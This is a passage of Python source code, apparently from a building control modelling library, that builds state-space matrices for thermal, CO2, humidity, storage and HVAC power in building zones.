building_data.surfaces_adiabatic.loc[
building_data.surfaces_adiabatic['zone_name'].isin([zone_name]),
:
]
],
sort=False
).iterrows() # For all surfaces adjacent to the zone.
):
# Front.
state_matrix[
f'{zone_name}_radiator_hull_front_temperature',
f'{surface_name}_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_front_surfaces']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
/ zone_data.at['zone_surfaces_wall_area']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{surface_name}_temperature',
f'{zone_name}_radiator_hull_front_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_front_surfaces']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
/ zone_data.at['zone_surfaces_wall_area']
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
f'{surface_name}_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_front_surfaces']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
/ zone_data.at['zone_surfaces_wall_area']
/ surface_data.at['heat_capacity']
)
# Back.
state_matrix[
f'{zone_name}_radiator_hull_rear_temperature',
f'{surface_name}_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_rear_surfaces']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
/ zone_data.at['zone_surfaces_wall_area']
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{surface_name}_temperature',
f'{zone_name}_radiator_hull_rear_temperature'
] += (
1.0
/ zone_data.at['thermal_resistance_radiator_rear_surfaces']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
/ zone_data.at['zone_surfaces_wall_area']
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
f'{surface_name}_temperature'
] += (
- 1.0
/ zone_data.at['thermal_resistance_radiator_rear_surfaces']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
/ zone_data.at['zone_surfaces_wall_area']
/ surface_data.at['heat_capacity']
)
def define_heat_transfer_hvac_ahu():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_ahu_type']):
control_matrix[
f'{zone_name}_temperature',
f'{zone_name}_ahu_heat_air_flow'
] += (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['heat_capacity_air']
* (
zone_data.at['ahu_supply_air_temperature_setpoint']
- building_data.scenarios.at['linearization_zone_air_temperature_heat']
)
/ zone_data.at['heat_capacity']
)
control_matrix[
f'{zone_name}_temperature',
f'{zone_name}_ahu_cool_air_flow'
] += (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['heat_capacity_air']
* (
zone_data.at['ahu_supply_air_temperature_setpoint']
- building_data.scenarios.at['linearization_zone_air_temperature_cool']
)
/ zone_data.at['heat_capacity']
)
def define_heat_transfer_hvac_tu():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_tu_type']):
control_matrix[
f'{zone_name}_temperature',
f'{zone_name}_tu_heat_air_flow'
] += (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['heat_capacity_air']
* (
zone_data.at['tu_supply_air_temperature_setpoint']
- building_data.scenarios.at['linearization_zone_air_temperature_heat']
)
/ zone_data.at['heat_capacity']
)
control_matrix[
f'{zone_name}_temperature',
f'{zone_name}_tu_cool_air_flow'
] += (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['heat_capacity_air']
* (
zone_data.at['tu_supply_air_temperature_setpoint']
- building_data.scenarios.at['linearization_zone_air_temperature_cool']
)
/ zone_data.at['heat_capacity']
)
def define_heat_transfer_hvac_vent():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_vent_type']):
control_matrix[
f'{zone_name}_temperature',
f'{zone_name}_vent_air_flow'
] += (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['heat_capacity_air']
* (
building_data.scenarios.at['linearization_ambient_air_temperature']
- building_data.scenarios.at['linearization_zone_air_temperature']
)
/ zone_data.at['heat_capacity']
)
def define_co2_transfer():
for zone_name, zone_data in building_data.zones.iterrows():
if zone_data.at['fresh_air_flow_control_type'] == 'co2_based':
state_matrix[
f'{zone_name}_co2_concentration',
f'{zone_name}_co2_concentration'
] += (
- 1.0
* building_data.scenarios.at['linearization_zone_fresh_air_flow']
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ zone_data.at['zone_volume']
)
if pd.notnull(zone_data.at['hvac_ahu_type']):
control_matrix[
f'{zone_name}_co2_concentration',
f'{zone_name}_ahu_heat_air_flow'
] += (
- 1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.scenarios.at['linearization_zone_air_co2_concentration']
/ zone_data.at['zone_volume']
)
control_matrix[
f'{zone_name}_co2_concentration',
f'{zone_name}_ahu_cool_air_flow'
] += (
- 1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.scenarios.at['linearization_zone_air_co2_concentration']
/ zone_data.at['zone_volume']
)
if pd.notnull(zone_data.at['hvac_vent_type']):
control_matrix[
f'{zone_name}_co2_concentration',
f'{zone_name}_vent_air_flow'
] += (
- 1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.scenarios.at['linearization_zone_air_co2_concentration']
/ zone_data.at['zone_volume']
)
disturbance_matrix[
f'{zone_name}_co2_concentration',
'constant'
] += (
- 1.0
* zone_data.at['infiltration_rate']
/ 3600 # 1/h in 1/s.
* zone_data.at['zone_volume']
* building_data.scenarios.at['linearization_zone_air_co2_concentration']
)
if pd.notnull(zone_data.at['internal_gain_type']):
disturbance_matrix[
f'{zone_name}_co2_concentration',
zone_data.at['internal_gain_type'] + '_internal_gain_occupancy'
] += (
1.0
* zone_data.at['occupancy_density']
* zone_data.at['occupancy_co2_gain']
/ zone_data.at['zone_volume']
)
disturbance_matrix[
f'{zone_name}_co2_concentration',
'constant'
] += (
1.0
* building_data.scenarios.at['linearization_zone_fresh_air_flow']
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.scenarios.at['linearization_zone_air_co2_concentration']
/ zone_data.at['zone_volume']
)
def define_humidity_transfer():
# TODO: Change absolute humidity unit from kg/kg to g/kg for numerical performance.
for zone_name, zone_data in building_data.zones.iterrows():
if zone_data.at['humidity_control_type'] == 'humidity_based':
state_matrix[
f'{zone_name}_absolute_humidity',
f'{zone_name}_absolute_humidity'
] += (
- 1.0
* building_data.scenarios.at['linearization_zone_fresh_air_flow']
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['density_air']
/ zone_data.at['zone_air_mass']
)
if pd.notnull(zone_data.at['hvac_ahu_type']):
control_matrix[
f'{zone_name}_absolute_humidity',
f'{zone_name}_ahu_heat_air_flow'
] += (
- 1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['density_air']
* (
building_data.scenarios.at['linearization_zone_air_absolute_humidity']
- cobmo.utils.calculate_absolute_humidity_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
zone_data.at['ahu_supply_air_relative_humidity_setpoint']
)
)
/ zone_data.at['zone_air_mass']
)
control_matrix[
f'{zone_name}_absolute_humidity',
f'{zone_name}_ahu_cool_air_flow'
] += (
- 1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['density_air']
* (
building_data.scenarios.at['linearization_zone_air_absolute_humidity']
- cobmo.utils.calculate_absolute_humidity_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
zone_data.at['ahu_supply_air_relative_humidity_setpoint']
)
)
/ zone_data.at['zone_air_mass']
)
if pd.notnull(zone_data.at['hvac_vent_type']):
control_matrix[
f'{zone_name}_absolute_humidity',
f'{zone_name}_vent_air_flow'
] += (
- 1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
* building_data.parameters.at['density_air']
* (
building_data.scenarios.at['linearization_zone_air_absolute_humidity']
- building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
)
/ zone_data.at['zone_air_mass']
)
disturbance_matrix[
f'{zone_name}_absolute_humidity',
'constant'
] += (
- 1.0
* zone_data.at['infiltration_rate']
/ 3600 # 1/h in 1/s.
* zone_data.at['zone_volume']
* building_data.parameters.at['density_air']
* (
building_data.scenarios.at['linearization_zone_air_absolute_humidity']
- building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
)
/ zone_data.at['zone_air_mass']
)
if pd.notnull(zone_data.at['internal_gain_type']):
disturbance_matrix[
f'{zone_name}_absolute_humidity',
zone_data.at['internal_gain_type'] + '_internal_gain_occupancy'
] += (
1.0
* zone_data.at['occupancy_density']
* zone_data.at['occupancy_humidity_gain']
/ 1000 # kg in g.
/ zone_data.at['zone_air_mass']
)
disturbance_matrix[
f'{zone_name}_absolute_humidity',
'constant'
] += (
1.0
* building_data.scenarios.at['linearization_zone_fresh_air_flow']
/ 1000 # l in m³.
* building_data.scenarios.at['linearization_zone_air_absolute_humidity']
/ zone_data.at['zone_height']
)
def define_storage_state_of_charge():
# Sensible storage cooling.
if building_data.scenarios.at['storage_commodity_type'] == 'sensible_cooling':
# Storage charge.
control_matrix[
'storage_state_of_charge',
'storage_charge_thermal_power_cooling'
] += (
100.0 # in %.
* building_data.scenarios.at['storage_round_trip_efficiency']
/ building_data.scenarios.at['storage_capacity']
/ building_data.parameters.at['water_density']
/ building_data.parameters.at['water_specific_heat']
/ building_data.scenarios.at['storage_sensible_temperature_delta']
)
# Storage discharge.
control_matrix[
'storage_state_of_charge',
'storage_discharge_thermal_power_cooling'
] += (
- 100.0 # in %.
/ building_data.scenarios.at['storage_capacity']
/ building_data.parameters.at['water_density']
/ building_data.parameters.at['water_specific_heat']
/ building_data.scenarios.at['storage_sensible_temperature_delta']
)
# Sensible storage heating.
if building_data.scenarios.at['storage_commodity_type'] == 'sensible_heating':
# Storage charge.
control_matrix[
'storage_state_of_charge',
'storage_charge_thermal_power_heating'
] += (
100.0 # in %.
* building_data.scenarios.at['storage_round_trip_efficiency']
/ building_data.scenarios.at['storage_capacity']
/ building_data.parameters.at['water_density']
/ building_data.parameters.at['water_specific_heat']
/ building_data.scenarios.at['storage_sensible_temperature_delta']
)
# Storage discharge.
control_matrix[
'storage_state_of_charge',
'storage_discharge_thermal_power_heating'
] += (
- 100.0 # in %.
/ building_data.scenarios.at['storage_capacity']
/ building_data.parameters.at['water_density']
/ building_data.parameters.at['water_specific_heat']
/ building_data.scenarios.at['storage_sensible_temperature_delta']
)
# Battery storage.
if building_data.scenarios.at['storage_commodity_type'] == 'battery':
# Storage charge.
control_matrix[
'storage_state_of_charge',
'storage_charge_electric_power'
] += (
100.0 # in %.
* building_data.scenarios.at['storage_round_trip_efficiency']
/ building_data.scenarios.at['storage_capacity']
/ 3600 / 1000 # kWh in Ws.
/ building_data.scenarios.at['storage_battery_depth_of_discharge']
)
# Storage discharge.
control_matrix[
'storage_state_of_charge',
'storage_discharge_electric_power'
] += (
- 100.0 # in %.
/ building_data.scenarios.at['storage_capacity']
/ 3600 / 1000 # kWh in Ws.
/ building_data.scenarios.at['storage_battery_depth_of_discharge']
)
# Storage losses.
if pd.notnull(building_data.scenarios.at['storage_type']):
state_matrix[
'storage_state_of_charge',
'storage_state_of_charge'
] += (
- 1.0
* building_data.scenarios.at['storage_self_discharge_rate']
/ 3600 # %/h in %/s.
)
def define_output_zone_temperature():
for zone_name, zone_data in building_data.zones.iterrows():
state_output_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] = 1.0
def define_output_zone_co2_concentration():
for zone_name, zone_data in building_data.zones.iterrows():
if zone_data.at['fresh_air_flow_control_type'] == 'co2_based':
state_output_matrix[
f'{zone_name}_co2_concentration',
f'{zone_name}_co2_concentration'
] = 1.0
def define_output_zone_humidity():
for zone_name, zone_data in building_data.zones.iterrows():
if zone_data.at['humidity_control_type'] == 'humidity_based':
state_output_matrix[
f'{zone_name}_absolute_humidity',
f'{zone_name}_absolute_humidity'
] = 1.0
def define_output_internal_gain_power():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['internal_gain_type']):
# Electric power due to appliances.
disturbance_output_matrix[
'electric_power_balance',
zone_data.at['internal_gain_type'] + '_internal_gain_appliances'
] += (
1.0
* zone_data.at['appliances_heat_gain']
* zone_data.at['zone_area']
/ self.zone_area_total
)
# Thermal power heating due to warm water demand.
if pd.notnull(zone_data.at['warm_water_demand_thermal_power']):
disturbance_output_matrix[
'thermal_power_heating_balance',
zone_data.at['internal_gain_type'] + '_warm_water_demand'
] += (
1.0
* zone_data.at['warm_water_demand_thermal_power']
* zone_data.at['zone_area']
/ self.zone_area_total
)
def define_output_hvac_generic():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_generic_type']):
# Cooling power.
control_output_matrix[
f'{zone_name}_generic_cool_thermal_power',
f'{zone_name}_generic_cool_thermal_power'
] = 1.0
control_output_matrix[
'thermal_power_cooling_balance',
f'{zone_name}_generic_cool_thermal_power'
] = (
1.0
/ zone_data.at['generic_cooling_efficiency']
* zone_data.at['zone_area']
/ self.zone_area_total
)
# Heating power.
control_output_matrix[
f'{zone_name}_generic_heat_thermal_power',
f'{zone_name}_generic_heat_thermal_power'
] = 1.0
control_output_matrix[
'thermal_power_heating_balance',
f'{zone_name}_generic_heat_thermal_power'
] = (
1.0
/ zone_data.at['generic_heating_efficiency']
* zone_data.at['zone_area']
/ self.zone_area_total
)
def define_output_hvac_radiator_power():
if pd.notnull(building_data.zones['hvac_radiator_type']).any():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_radiator_type']):
# Heating power (radiators do not require cooling power).
control_output_matrix[
f'{zone_name}_radiator_thermal_power',
f'{zone_name}_radiator_thermal_power'
] = 1.0
control_output_matrix[
'thermal_power_heating_balance',
f'{zone_name}_radiator_thermal_power'
] = (
1.0
/ zone_data.at['radiator_heating_efficiency']
* zone_data.at['zone_area']
/ self.zone_area_total
)
def define_output_hvac_ahu_power():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_ahu_type']):
# Obtain parameters.
ahu_supply_air_absolute_humidity_setpoint = (
cobmo.utils.calculate_absolute_humidity_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
zone_data.at['ahu_supply_air_relative_humidity_setpoint']
)
)
delta_enthalpy_ahu_recovery = (
cobmo.utils.calculate_enthalpy_humid_air(
building_data.scenarios.at['linearization_zone_air_temperature'],
building_data.scenarios.at['linearization_zone_air_absolute_humidity']
)
- cobmo.utils.calculate_enthalpy_humid_air(
building_data.scenarios.at['linearization_ambient_air_temperature'],
building_data.scenarios.at['linearization_zone_air_absolute_humidity']
)
)
# Obtain enthalpies.
if (
building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
<= ahu_supply_air_absolute_humidity_setpoint
):
delta_enthalpy_ahu_cooling = min(
0.0,
cobmo.utils.calculate_enthalpy_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
)
- cobmo.utils.calculate_enthalpy_humid_air(
building_data.scenarios.at['linearization_ambient_air_temperature'],
building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
)
)
delta_enthalpy_ahu_heating = max(
0.0,
cobmo.utils.calculate_enthalpy_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
)
- cobmo.utils.calculate_enthalpy_humid_air(
building_data.scenarios.at['linearization_ambient_air_temperature'],
building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
)
)
delta_enthalpy_ahu_recovery_cooling = max(
delta_enthalpy_ahu_cooling,
min(
0.0,
zone_data.at['ahu_return_air_heat_recovery_efficiency']
* delta_enthalpy_ahu_recovery
)
)
delta_enthalpy_ahu_recovery_heating = min(
delta_enthalpy_ahu_heating,
max(
0.0,
zone_data.at['ahu_return_air_heat_recovery_efficiency']
* delta_enthalpy_ahu_recovery
)
)
else:
delta_enthalpy_ahu_cooling = (
cobmo.utils.calculate_dew_point_enthalpy_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
zone_data.at['ahu_supply_air_relative_humidity_setpoint']
)
- cobmo.utils.calculate_enthalpy_humid_air(
building_data.scenarios.at['linearization_ambient_air_temperature'],
building_data.scenarios.at['linearization_ambient_air_absolute_humidity']
)
)
delta_enthalpy_ahu_heating = (
cobmo.utils.calculate_enthalpy_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
ahu_supply_air_absolute_humidity_setpoint
)
- cobmo.utils.calculate_dew_point_enthalpy_humid_air(
zone_data.at['ahu_supply_air_temperature_setpoint'],
zone_data.at['ahu_supply_air_relative_humidity_setpoint']
)
)
delta_enthalpy_ahu_recovery_cooling = max(
delta_enthalpy_ahu_cooling,
min(
0.0,
zone_data.at['ahu_return_air_heat_recovery_efficiency']
* delta_enthalpy_ahu_recovery
)
)
delta_enthalpy_ahu_recovery_heating = 0.0
# Air flow.
control_output_matrix[
f'{zone_name}_ahu_cool_air_flow',
f'{zone_name}_ahu_cool_air_flow'
] = 1.0
control_output_matrix[
f'{zone_name}_ahu_heat_air_flow',
f'{zone_name}_ahu_heat_air_flow'
] = 1.0
# Cooling power.
control_output_matrix[
'thermal_power_cooling_balance',
f'{zone_name}_ahu_cool_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* (
abs(delta_enthalpy_ahu_cooling)
- abs(delta_enthalpy_ahu_recovery_cooling)
)
/ zone_data.at['ahu_cooling_efficiency']
)
control_output_matrix[
'thermal_power_cooling_balance',
f'{zone_name}_ahu_heat_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* (
abs(delta_enthalpy_ahu_cooling)
- abs(delta_enthalpy_ahu_recovery_cooling)
)
/ zone_data.at['ahu_cooling_efficiency']
)
# Heating power.
control_output_matrix[
'thermal_power_heating_balance',
f'{zone_name}_ahu_cool_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* (
abs(delta_enthalpy_ahu_heating)
- abs(delta_enthalpy_ahu_recovery_heating)
)
/ zone_data.at['ahu_heating_efficiency']
)
control_output_matrix[
'thermal_power_heating_balance',
f'{zone_name}_ahu_heat_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* (
abs(delta_enthalpy_ahu_heating)
- abs(delta_enthalpy_ahu_recovery_heating)
)
/ zone_data.at['ahu_heating_efficiency']
)
# Fan power.
control_output_matrix[
'electric_power_balance',
f'{zone_name}_ahu_cool_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* zone_data.at['ahu_fan_efficiency']
)
control_output_matrix[
'electric_power_balance',
f'{zone_name}_ahu_heat_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* zone_data.at['ahu_fan_efficiency']
)
def define_output_hvac_tu_power():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_tu_type']):
# Calculate enthalpies.
if zone_data.at['tu_air_intake_type'] == 'zone':
delta_enthalpy_tu_cooling = building_data.parameters.at['heat_capacity_air'] * (
building_data.scenarios.at['linearization_zone_air_temperature_cool']
- zone_data.at['tu_supply_air_temperature_setpoint']
)
delta_enthalpy_tu_heating = building_data.parameters.at['heat_capacity_air'] * (
building_data.scenarios.at['linearization_zone_air_temperature_heat']
- zone_data.at['tu_supply_air_temperature_setpoint']
)
elif zone_data.at['tu_air_intake_type'] == 'ahu':
delta_enthalpy_tu_cooling = building_data.parameters.at['heat_capacity_air'] * (
building_data.scenarios.at['ahu_supply_air_temperature_setpoint']
- zone_data.at['tu_supply_air_temperature_setpoint']
)
delta_enthalpy_tu_heating = building_data.parameters.at['heat_capacity_air'] * (
building_data.scenarios.at['ahu_supply_air_temperature_setpoint']
- zone_data.at['tu_supply_air_temperature_setpoint']
)
else:
logger.error(f"Unknown `tu_air_intake_type` type: {zone_data.at['tu_air_intake_type']}")
raise ValueError
# Air flow.
control_output_matrix[
f'{zone_name}_tu_cool_air_flow',
f'{zone_name}_tu_cool_air_flow'
] = 1.0
control_output_matrix[
f'{zone_name}_tu_heat_air_flow',
f'{zone_name}_tu_heat_air_flow'
] = 1.0
# Cooling power.
control_output_matrix[
'thermal_power_cooling_balance',
f'{zone_name}_tu_cool_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* abs(delta_enthalpy_tu_cooling)
/ zone_data.at['tu_cooling_efficiency']
)
# Heating power.
control_output_matrix[
'thermal_power_heating_balance',
f'{zone_name}_tu_heat_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* abs(delta_enthalpy_tu_heating)
/ zone_data.at['tu_heating_efficiency']
)
# Fan power.
control_output_matrix[
'electric_power_balance',
f'{zone_name}_tu_cool_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* zone_data.at['tu_fan_efficiency']
)
control_output_matrix[
'electric_power_balance',
f'{zone_name}_tu_heat_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* zone_data.at['tu_fan_efficiency']
)
def define_output_hvac_vent_power():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_vent_type']):
# Air flow.
control_output_matrix[
f'{zone_name}_vent_air_flow',
f'{zone_name}_vent_air_flow'
] = 1.0
# Fan power.
control_output_matrix[
'electric_power_balance',
f'{zone_name}_vent_air_flow'
] = (
1.0
/ 1000 # l in m³.
* zone_data.at['zone_area']
/ self.zone_area_total
* building_data.parameters.at['density_air']
* zone_data.at['vent_fan_efficiency']
)
def define_output_fresh_air_flow():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_ahu_type']):
control_output_matrix[
f'{zone_name}_total_fresh_air_flow',
f'{zone_name}_ahu_cool_air_flow'
] = 1.0
control_output_matrix[
f'{zone_name}_total_fresh_air_flow',
f'{zone_name}_ahu_heat_air_flow'
] = 1.0
if pd.notnull(zone_data.at['hvac_vent_type']):
control_output_matrix[
f'{zone_name}_total_fresh_air_flow',
f'{zone_name}_vent_air_flow'
] = 1.0
disturbance_output_matrix[
f'{zone_name}_total_fresh_air_flow',
'constant'
] += (
zone_data.at['infiltration_rate']
/ 3600 # 1/h in 1/s.
* zone_data.at['zone_volume']
* 1000 # m³ in l.
/ zone_data.at['zone_area']
)
def define_output_storage_state_of_charge():
if pd.notnull(building_data.scenarios.at['storage_type']):
state_output_matrix[
'storage_state_of_charge',
'storage_state_of_charge'
] = 1.0
def define_output_storage_power():
# Sensible storage cooling.
if building_data.scenarios.at['storage_commodity_type'] == 'sensible_cooling':
control_output_matrix[
'thermal_power_cooling_balance',
'storage_charge_thermal_power_cooling'
] = 1.0
control_output_matrix[
'storage_charge_thermal_power_cooling',
'storage_charge_thermal_power_cooling'
] = 1.0
control_output_matrix[
'thermal_power_cooling_balance',
'storage_discharge_thermal_power_cooling'
] = - 1.0
control_output_matrix[
'storage_discharge_thermal_power_cooling',
'storage_discharge_thermal_power_cooling'
] = 1.0
# Sensible storage heating.
if building_data.scenarios.at['storage_commodity_type'] == 'sensible_heating':
control_output_matrix[
'thermal_power_heating_balance',
'storage_charge_thermal_power_heating'
] = 1.0
control_output_matrix[
'storage_charge_thermal_power_heating',
'storage_charge_thermal_power_heating'
] = 1.0
control_output_matrix[
'thermal_power_heating_balance',
'storage_discharge_thermal_power_heating'
] = - 1.0
control_output_matrix[
'storage_discharge_thermal_power_heating',
'storage_discharge_thermal_power_heating'
] = 1.0
# Battery storage.
if building_data.scenarios.at['storage_commodity_type'] == 'battery':
control_output_matrix[
'electric_power_balance',
'storage_charge_electric_power'
] = 1.0
control_output_matrix[
'storage_charge_electric_power',
'storage_charge_electric_power'
] = 1.0
control_output_matrix[
'electric_power_balance',
'storage_discharge_electric_power'
] = - 1.0
control_output_matrix[
'storage_discharge_electric_power',
'storage_discharge_electric_power'
] = 1.0
def define_output_plant_power():
# Cooling.
control_output_matrix[
'thermal_power_cooling_balance',
'plant_thermal_power_cooling'
] = - 1.0
control_output_matrix[
'plant_thermal_power_cooling',
'plant_thermal_power_cooling'
] = 1.0
control_output_matrix[
'electric_power_balance',
'plant_thermal_power_cooling'
] = (
1.0
/ building_data.scenarios.at['plant_cooling_efficiency']
)
# Heating.
control_output_matrix[
'thermal_power_heating_balance',
'plant_thermal_power_heating'
] = - 1.0
control_output_matrix[
'plant_thermal_power_heating',
'plant_thermal_power_heating'
] = 1.0
control_output_matrix[
'electric_power_balance',
'plant_thermal_power_heating'
] = (
1.0
/ building_data.scenarios.at['plant_heating_efficiency']
)
def define_output_grid_power():
# Electric.
control_output_matrix[
'electric_power_balance',
'grid_electric_power'
] = - 1.0
control_output_matrix[
'grid_electric_power',
'grid_electric_power'
] = 1.0
# Cooling.
control_output_matrix[
'thermal_power_cooling_balance',
'grid_thermal_power_cooling'
] = - 1.0
control_output_matrix[
'grid_thermal_power_cooling',
'grid_thermal_power_cooling'
] = 1.0
# Heating.
control_output_matrix[
'thermal_power_heating_balance',
'grid_thermal_power_heating'
] = - 1.0
control_output_matrix[
'grid_thermal_power_heating',
'grid_thermal_power_heating'
] = 1.0
def define_output_validation_surface_temperature():
for surface_name, surface_data in (
pd.concat([
building_data.surfaces_adiabatic,
building_data.surfaces_exterior,
building_data.surfaces_interior
], sort=False).iterrows()
):
if surface_data.at['heat_capacity'] != 0.0: # Surfaces with non-zero heat capacity
state_output_matrix[
f'{surface_name}_temperature',
f'{surface_name}_temperature'
] = 1.0
def define_output_validation_surfaces_exterior_irradiation_gain_exterior():
for surface_name, surface_data in building_data.surfaces_exterior.iterrows():
if surface_data.at['heat_capacity'] != 0.0: # Surfaces with non-zero heat capacity
disturbance_output_matrix[
f'{surface_name}_irradiation_gain_exterior',
'irradiation_' + surface_data.at['direction_name']
] += (
surface_data.at['absorptivity_surface']
* (1 - surface_data.at['window_wall_ratio'])
)
else: # Surfaces with neglected heat capacity
disturbance_output_matrix[
surface_data.at['surface_name'] + '_irradiation_gain_exterior',
'irradiation_' + surface_data.at['direction_name']
] += (
surface_data.at['absorptivity_surface']
* (1 - surface_data.at['window_wall_ratio'])
)
def define_output_validation_surfaces_exterior_convection_interior():
for surface_name, surface_data in building_data.surfaces_exterior.iterrows():
# Total zone surface area for later calculating share of interior (indirect) irradiation
zone_surface_area = sum(
zone_surface_data.at['surface_area']
* (1 - zone_surface_data.at['window_wall_ratio'])
for zone_surface_name, zone_surface_data in pd.concat(
[
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
],
building_data.surfaces_interior[
building_data.surfaces_interior['zone_name'] == surface_data.at['zone_name']
],
building_data.surfaces_interior[
building_data.surfaces_interior['zone_adjacent_name'] == surface_data.at['zone_name']
],
building_data.surfaces_adiabatic[
building_data.surfaces_adiabatic['zone_name'] == surface_data.at['zone_name']
]
],
sort=False
).iterrows() # For all surfaces adjacent to the zone
)
if surface_data.at['heat_capacity'] != 0.0: # Surfaces with non-zero heat capacity
# Convective heat transfer from the surface towards zone
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ zone_surface_area
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* (1.0 - surface_data.at['window_wall_ratio'])
* (
1.0
- (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
)
)
state_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
f'{surface_name}_temperature'
] += (
(1.0 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
)
state_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
surface_data.at['zone_name'] + '_temperature'
] += (
- 1.0
* (1.0 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
)
else: # Surfaces with neglected heat capacity
# Complete convective heat transfer from surface to zone
disturbance_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
'irradiation_' + surface_data.at['direction_name']
] += (
surface_data.at['absorptivity_surface']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
